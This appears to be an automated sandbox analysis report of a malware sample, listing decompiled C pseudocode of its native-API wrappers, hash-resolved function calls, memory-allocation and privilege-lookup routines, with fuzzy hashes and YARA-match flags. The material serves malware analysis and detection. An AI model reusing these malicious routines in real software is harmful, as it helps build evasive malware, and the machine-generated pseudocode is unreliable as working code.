                                                            
                                                            				_t3 = _a4 + 0xa6c; // 0xa6c
                                                            				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                                            				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                            				return _t21;
                                                            			}

                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,?,004192AF,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,004192AF,?,00000000,00000060,00000000,00000000), ref: 0041E580
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: f9e00ad4482a0849a297f43a55053ea859885cbadaec293609717f189d3e0e37
                                                            • Instruction ID: 2b1b68b6ace5d83723ffac424aef60341f3aee9ed0c6c8572fed624b1aa90786
                                                            • Opcode Fuzzy Hash: f9e00ad4482a0849a297f43a55053ea859885cbadaec293609717f189d3e0e37
                                                            • Instruction Fuzzy Hash: 69F06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158258BA0997241D630E8518BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 164 41e5dd-41e62c call 41f193 NtReadFile
                                                            C-Code - Quality: 37%
                                                            			E0041E5DD(void* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                            				void* _t18;
                                                            				intOrPtr* _t29;
                                                            				signed int _t31;
                                                            				signed int _t32;
                                                            
                                                            				_t32 = _t31 | 0x8b55fbac;
                                                            				_t13 = _a4;
                                                            				_t3 = _t13 + 0xa74; // 0xa76
                                                            				_t29 = _t3;
                                                            				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _t13, _t29,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
                                                            				_t18 =  *((intOrPtr*)( *_t29))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __esi, _t32); // executed
                                                            				return _t18;
                                                            			}

                                                            APIs
                                                            • NtReadFile.NTDLL(00419473,00414943,FFFFFFFF,00418F6D,00000002,?,00419473,00000002,00418F6D,FFFFFFFF,00414943,00419473,00000002,00000000), ref: 0041E628
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: ed9694a341561753e05285050faa4932f5bf3abbb446f9e147fe4a392cff66db
                                                            • Instruction ID: 953d8ee4d0a84539e4fc25736fa2f222501fd37172b16a1631702880f19584fb
                                                            • Opcode Fuzzy Hash: ed9694a341561753e05285050faa4932f5bf3abbb446f9e147fe4a392cff66db
                                                            • Instruction Fuzzy Hash: F6F0F4B6204108AFCB04DF99DC84EEB37AAAF8C754F118219BA4DD7640D630E8118BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 167 41e5e3-41e5f9 168 41e5ff-41e62c NtReadFile 167->168 169 41e5fa call 41f193 167->169 169->168
                                                            C-Code - Quality: 37%
                                                            			E0041E5E3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                            				void* _t18;
                                                            				intOrPtr* _t27;
                                                            
                                                            				_t3 = _a4 + 0xa74; // 0xa76
                                                            				_t27 = _t3;
                                                            				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
                                                            				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                                            				return _t18;
                                                            			}

                                                            APIs
                                                            • NtReadFile.NTDLL(00419473,00414943,FFFFFFFF,00418F6D,00000002,?,00419473,00000002,00418F6D,FFFFFFFF,00414943,00419473,00000002,00000000), ref: 0041E628
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 4a8275df831c3d103a1ee09491f1c56fc34e4d4c9c2c3dd0733fd8e64b380651
                                                            • Instruction ID: 8267991fd254506ff5c12054cf4ce0d2ef14d088a061f9b48d3366a1a6515465
                                                            • Opcode Fuzzy Hash: 4a8275df831c3d103a1ee09491f1c56fc34e4d4c9c2c3dd0733fd8e64b380651
                                                            • Instruction Fuzzy Hash: D0F0AFB2204208ABCB14DF99DC85EEB77ADAF8C754F118659BA0DA7241D630E8118BA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 170 41e713-41e750 call 41f193 NtAllocateVirtualMemory
                                                            C-Code - Quality: 100%
                                                            			E0041E713(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                            				long _t14;
                                                            
                                                            				_t10 = _a4;
                                                            				_t2 = _t10 + 0x14; // 0x6ad04d03
                                                            				_t3 = _t10 + 0xa8c; // 0x404043
                                                            				E0041F193( *_t2, _a4, _t3,  *_t2, 0, 0x30);
                                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                            				return _t14;
                                                            			}




                                                            0x0041e716
                                                            0x0041e719
                                                            0x0041e722
                                                            0x0041e72a
                                                            0x0041e74c
                                                            0x0041e750

                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035B7,00000004,00001000,00000000), ref: 0041E74C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: 1a2afb1199764b3ee1871c756a078253b48bd289b14f1863eddbd5e4938c396b
                                                            • Instruction ID: e6812e2bdcb128a110ff40e1d504f12d9a01502f7c3e321230f9032499d83fe4
                                                            • Opcode Fuzzy Hash: 1a2afb1199764b3ee1871c756a078253b48bd289b14f1863eddbd5e4938c396b
                                                            • Instruction Fuzzy Hash: D5F01EB2200208ABCB18DF89DC81EEB77ADAF88754F018119BE0897241C630F811CBF4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0041E663(intOrPtr _a4, void* _a8) {
                                                            				long _t8;
                                                            
                                                            				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
                                                            				_t8 = NtClose(_a8); // executed
                                                            				return _t8;
                                                            			}




                                                            0x0041e67a
                                                            0x0041e688
                                                            0x0041e68c

                                                            APIs
                                                            • NtClose.NTDLL(00410318,00000000,?,00410318,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E688
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 483295ff726938af70535adf8b8cac973edaec2d38b825176723024c9b71d713
                                                            • Instruction ID: 02376b6f76cb9e47f23ed12eca07df7f6f29c9363c61c2694102c291e86304b3
                                                            • Opcode Fuzzy Hash: 483295ff726938af70535adf8b8cac973edaec2d38b825176723024c9b71d713
                                                            • Instruction Fuzzy Hash: 18D01772604214BBD610EBA9DC89FD77BADEF48664F018469BA1C5B642C570FA0086E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: f99cc7b63bb3816d4bd9ff71aad732e164d7ea1779664a222078b3ad2b0b2c81
                                                            • Instruction ID: 805eb357daac78acba7b1ddbc40b622d27022bec3dc3e7796499cd02f3b6cb89
                                                            • Opcode Fuzzy Hash: f99cc7b63bb3816d4bd9ff71aad732e164d7ea1779664a222078b3ad2b0b2c81
                                                            • Instruction Fuzzy Hash: 2290026570100502D24171694444616000A97D0381F91C032A1014595ECA658992F171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6735715c33e0f5900508609589f523574fc87d132aba90311dea84a4ac42b7db
                                                            • Instruction ID: 2c629dfb8b80f07489c97dcf184b86cf59ff6b74f806cc09c031a315a2475121
                                                            • Opcode Fuzzy Hash: 6735715c33e0f5900508609589f523574fc87d132aba90311dea84a4ac42b7db
                                                            • Instruction Fuzzy Hash: FA6148B1D046289FDB10DFA5DC81AEF77B8EF45304F4401AEE408A7141EB799E46CBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 111 4098bc-4098d4 112 4098dd-409917 call 420c03 call 40cf43 call 402e53 call 419553 111->112 113 4098d8 call 420163 111->113 122 409950-409956 112->122 123 409919-40992a PostThreadMessageW 112->123 113->112 123->122 124 40992c-40994d call 40c613 123->124 124->122
                                                            C-Code - Quality: 76%
                                                            			E004098BC(void* __eax, intOrPtr _a4, long _a8) {
                                                            				char _v67;
                                                            				char _v68;
                                                            				void* _t16;
                                                            				int _t18;
                                                            				long _t31;
                                                            				int _t34;
                                                            				void* _t37;
                                                            				void* _t39;
                                                            				void* _t44;
                                                            
                                                            				_t44 = __eax -  *((intOrPtr*)(__eax - 0x4f));
                                                            				_t37 = _t39;
                                                            				_push(0x55aae438);
                                                            				_v68 = 0;
                                                            				E00420163( &_v67, 0, 0x3f);
                                                            				E00420C03( &_v68, 3);
                                                            				_t22 = _a4;
                                                            				_t16 = E0040CF43(_t44, _a4 + 0x20,  &_v68); // executed
                                                            				_t18 = E00419553(_a4 + 0x20, _t16, 0, 0, E00402E53(0x987b2170));
                                                            				_t34 = _t18;
                                                            				if(_t34 != 0) {
                                                            					_t31 = _a8;
                                                            					_t18 = PostThreadMessageW(_t31, 0x111, 0, 0); // executed
                                                            					if(_t18 == 0) {
                                                            						_t18 =  *_t34(_t31, 0x8003, _t37 + (E0040C613(1, 8, _t22 + 0x884) & 0x000000ff) - 0x40, _t18);
                                                            					}
                                                            				}
                                                            				return _t18;
                                                            			}













                                                            APIs
                                                            • PostThreadMessageW.USER32(000030DF,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409926
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: 02b377b8155b6763f8e600d6daca9bc5beabba54061841012be32f76a870478e
                                                            • Instruction ID: fcd993cc6d1a733398719f35f0280be16b01ecc62254b66b856764c646ee8f35
                                                            • Opcode Fuzzy Hash: 02b377b8155b6763f8e600d6daca9bc5beabba54061841012be32f76a870478e
                                                            • Instruction Fuzzy Hash: 6F11C872A402157BE720A695DC82FAF776C9B44B44F44412DFF04BB2C2D6A8AE0583E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 84%
                                                            			E004098C3(void* __eflags, intOrPtr _a4, long _a8) {
                                                            				char _v67;
                                                            				char _v68;
                                                            				void* _t13;
                                                            				int _t15;
                                                            				long _t25;
                                                            				int _t27;
                                                            				void* _t28;
                                                            				void* _t32;
                                                            
                                                            				_t32 = __eflags;
                                                            				_v68 = 0;
                                                            				E00420163( &_v67, 0, 0x3f);
                                                            				E00420C03( &_v68, 3);
                                                            				_t19 = _a4;
                                                            				_t13 = E0040CF43(_t32, _a4 + 0x20,  &_v68); // executed
                                                            				_t15 = E00419553(_a4 + 0x20, _t13, 0, 0, E00402E53(0x987b2170));
                                                            				_t27 = _t15;
                                                            				if(_t27 != 0) {
                                                            					_t25 = _a8;
                                                            					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
                                                            					if(_t15 == 0) {
                                                            						return  *_t27(_t25, 0x8003, _t28 + (E0040C613(1, 8, _t19 + 0x884) & 0x000000ff) - 0x40, _t15);
                                                            					}
                                                            				}
                                                            				return _t15;
                                                            			}












                                                            APIs
                                                            • PostThreadMessageW.USER32(000030DF,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409926
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: c8afd3c7f82155ffec076d7c5c7bbf8f0bc26e0f65edd62f314378a29830e86b
                                                            • Instruction ID: 43d5e70f63f4c5382cf88fe4c11c3766e8f12ce393aa0dafb307e6f3d78d8bd5
                                                            • Opcode Fuzzy Hash: c8afd3c7f82155ffec076d7c5c7bbf8f0bc26e0f65edd62f314378a29830e86b
                                                            • Instruction Fuzzy Hash: 1A019B72A4021976E721A6959C82FEF776C9B40B54F14412DFF047A1C2D6A86D0543E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 173 41e7cb-41e7cd 174 41e803-41e81a call 41f193 173->174 175 41e7cf-41e7d1 173->175 177 41e81f-41e834 RtlAllocateHeap 174->177 175->174
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00418C19,?,004193B0,004193B0,?,00418C19,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E830
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a4d521e3780af0d64b5cf470f13098c19ba62c6ebb2819cf680370de7f4a23a9
                                                            • Instruction ID: d7f273ee16de7898e1738b7ece0aee8d8e366c2e9b1e2ee52fb53ba4aa615557
                                                            • Opcode Fuzzy Hash: a4d521e3780af0d64b5cf470f13098c19ba62c6ebb2819cf680370de7f4a23a9
                                                            • Instruction Fuzzy Hash: 05E039B5200214BBC714DE5ACC45E973B6DEF85664F118055FD099B241C130E904CAF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 204 41e843-41e874 call 41f193 RtlFreeHeap
                                                            C-Code - Quality: 79%
                                                            			E0041E843(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                            				char _t10;
                                                            
                                                            				asm("in al, dx");
                                                            				_t7 = _a4;
                                                            				_t3 = _t7 + 0xaa0; // 0xaa0
                                                            				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                            				return _t10;
                                                            			}





                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,67F1BF61,00000000,?), ref: 0041E870
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 46db6303f9a58a8c7d09dc1a2f0754141f145a90f386e2de4ae6793d98ed8e37
                                                            • Instruction ID: 721e4973953a84db4dcddf94a1e1433d710c653feace7435bf47e9ee9c7b7d5b
                                                            • Opcode Fuzzy Hash: 46db6303f9a58a8c7d09dc1a2f0754141f145a90f386e2de4ae6793d98ed8e37
                                                            • Instruction Fuzzy Hash: 4DE012B1200208ABCB14EF89DC49EA737ADAF88754F018469BA095B282C630E914CAF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 201 41e803-41e834 call 41f193 RtlAllocateHeap
                                                            C-Code - Quality: 100%
                                                            			E0041E803(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                            				void* _t10;
                                                            
                                                            				_t3 = _a4 + 0xa9c; // 0xa9c
                                                            				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                            				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                            				return _t10;
                                                            			}





                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00418C19,?,004193B0,004193B0,?,00418C19,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E830
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a317e6132b889e06773fbbe00fc17c7e823b24563ddeed233e7f5cbfe3f53d2a
                                                            • Instruction ID: 1e3ab82d362c24e98813a00aa952a333a9cd0421c58b75dc5d1474d2b11c7bf2
                                                            • Opcode Fuzzy Hash: a317e6132b889e06773fbbe00fc17c7e823b24563ddeed233e7f5cbfe3f53d2a
                                                            • Instruction Fuzzy Hash: EDE012B2200208ABCB14EF89DC45EA737ADAF88664F018469BA085B242C630F9148AF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 178 410093-4100ac 179 4100b2-4100b7 178->179 180 4100ad call 419553 178->180 181 4100b9-41011d call 420163 call 40d413 call 40ffa3 179->181 182 4100bb-4100cc GetUserGeoID 179->182 180->179 189 410122-41012a 181->189 190 410144-410146 189->190 191 41012c-41012e 189->191 192 410158-41015e 190->192 193 410148-41014c 190->193 194 410130-410137 call 41e663 191->194 195 41013a-410143 191->195 193->192 197 41014e-410155 call 41e663 193->197 194->195 197->192
                                                            C-Code - Quality: 37%
                                                            			E00410093(intOrPtr _a4) {
                                                            				intOrPtr* _t7;
                                                            				void* _t8;
                                                            
                                                            				_t7 = E00419553(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
                                                            				if(_t7 != 0) {
                                                            					_t8 =  *_t7(0x10); // executed
                                                            					return 0 | _t8 == 0x000000f1;
                                                            				} else {
                                                            					return _t7;
                                                            				}
                                                            			}






                                                            APIs
                                                            • GetUserGeoID.KERNELBASE(00000010), ref: 004100BD
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: User
                                                            • String ID:
                                                            • API String ID: 765557111-0
                                                            • Opcode ID: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                            • Instruction ID: 51bb3e4d3c65d1b68e811fd300e6297570c351fdba75a3772b9df24f0de606b7
                                                            • Opcode Fuzzy Hash: 5c78032def2810ca0ad8a16165e38517362f870899e299bda81b49b85eaa7669
                                                            • Instruction Fuzzy Hash: DAE0C27768030467FB30A1A99C46FB6364E5B84B00F048475F90CE63C2D4E8E8C00019
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 207 41e9a3-41e9d7 call 41f193 LookupPrivilegeValueW
                                                            C-Code - Quality: 100%
                                                            			E0041E9A3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                            				int _t10;
                                                            
                                                            				E0041F193( *((intOrPtr*)(_a4 + 0x3b0)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x3b0)), 0, 0x46);
                                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                            				return _t10;
                                                            			}





                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEE5,0040FEE5,?,00000000,?,?), ref: 0041E9D3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: 82c5a5ab97d4eb4480414d61d3416bef4d430d63bd1f97b56dd2d6bdd6b819e2
                                                            • Instruction ID: 478dd373caa91782934bf72652368151c9cc639b58a8f90b17d0897d397b7721
                                                            • Opcode Fuzzy Hash: 82c5a5ab97d4eb4480414d61d3416bef4d430d63bd1f97b56dd2d6bdd6b819e2
                                                            • Instruction Fuzzy Hash: 38E01AB1600304ABC714DF49CC45FE737ADAF88654F014469BA0857242C634E9148AF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E0041E845() {
                                                            				char _t10;
                                                            				void* _t18;
                                                            
                                                            				asm("in al, dx");
                                                            				_t7 =  *((intOrPtr*)(_t18 + 8));
                                                            				_t3 = _t7 + 0xaa0; // 0xaa0
                                                            				E0041F193( *((intOrPtr*)( *((intOrPtr*)(_t18 + 8)) + 0x14)), _t7, _t3,  *((intOrPtr*)( *((intOrPtr*)(_t18 + 8)) + 0x14)), 0, 0x35);
                                                            				_t10 = RtlFreeHeap( *(_t18 + 0xc),  *(_t18 + 0x10),  *(_t18 + 0x14)); // executed
                                                            				return _t10;
                                                            			}






                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,67F1BF61,00000000,?), ref: 0041E870
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 16488a0969da05b2cb0e09bf84498e270ecd2a7857b61221015f7094cc6fefb7
                                                            • Instruction ID: 90b2fd086dbed490b836dcd73ca76eaa7bb3befc7414c65856cc485b600f3304
                                                            • Opcode Fuzzy Hash: 16488a0969da05b2cb0e09bf84498e270ecd2a7857b61221015f7094cc6fefb7
                                                            • Instruction Fuzzy Hash: B8E046B1200204BFCB14DF59DC48FE73B6DEF88354F018569F9099B281C230E915CAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 28%
                                                            			E0041E876(intOrPtr _a4, void* _a8) {
                                                            				void* _t19;
                                                            
                                                            				asm("xlatb");
                                                            				asm("in al, 0x1b");
                                                            				if(_t19 <= 0) {
                                                            					_t6 = _a4;
                                                            					E0041F193( *((intOrPtr*)(_a4 + 0x4cc)), _a4, _t6 + 0xaa8,  *((intOrPtr*)(_a4 + 0x4cc)), 0, 0x36);
                                                            				}
                                                            				asm("adc al, 0x52"); // executed
                                                            				ExitProcess(??);
                                                            			}

                                                            APIs
                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8AB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: 299ce261b31517164f817ecf6578126c28507b9422eeec8d687af3fec42889a5
                                                            • Instruction ID: 96147be26e6388fcd3053bb24dc27cc49bce8baa340c1af9fc20bede1d2fb69c
                                                            • Opcode Fuzzy Hash: 299ce261b31517164f817ecf6578126c28507b9422eeec8d687af3fec42889a5
                                                            • Instruction Fuzzy Hash: B2E0DF346013047BC6209B45CCC1FC7B7A8AF08B90F458464BA081B242C230FA10C7D4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0041E883(intOrPtr _a4, void* _a8) {
                                                            
                                                            				_t5 = _a4;
                                                            				E0041F193( *((intOrPtr*)(_a4 + 0x4cc)), _a4, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x4cc)), 0, 0x36);
                                                            				asm("adc al, 0x52"); // executed
                                                            				ExitProcess(??);
                                                            			}

                                                            APIs
                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E8AB
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: 793c90c4681a4b6202f5ac56fbb43b9a7e517e4410fe7f89bfe45fb9aa8a43ba
                                                            • Instruction ID: 50992a3d472a59096940bbb5054f34203a4f71d2cf9700162529e2e9092c3957
                                                            • Opcode Fuzzy Hash: 793c90c4681a4b6202f5ac56fbb43b9a7e517e4410fe7f89bfe45fb9aa8a43ba
                                                            • Instruction Fuzzy Hash: 36D0C772600204BBCA20EB88CC85FD337ACEF446A0F0080A5BA0C5B282C630FA00C7E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_9d0000_zkvixbqxp.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 7b4d59301c6ac7c6f914524daee675cbd60f169d370a4182ac9f496176946508
                                                            • Instruction ID: ebb6eae82783042fdfa7b67d75d166a2d69caf98c6c08761ff6f1cae3a7c831a
                                                            • Opcode Fuzzy Hash: 7b4d59301c6ac7c6f914524daee675cbd60f169d370a4182ac9f496176946508
                                                            • Instruction Fuzzy Hash: BCB092B2A064C5CAEB51E7B04A08B2B7A04BBE0741F26C062E2020681A47B8C491F6B6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 66%
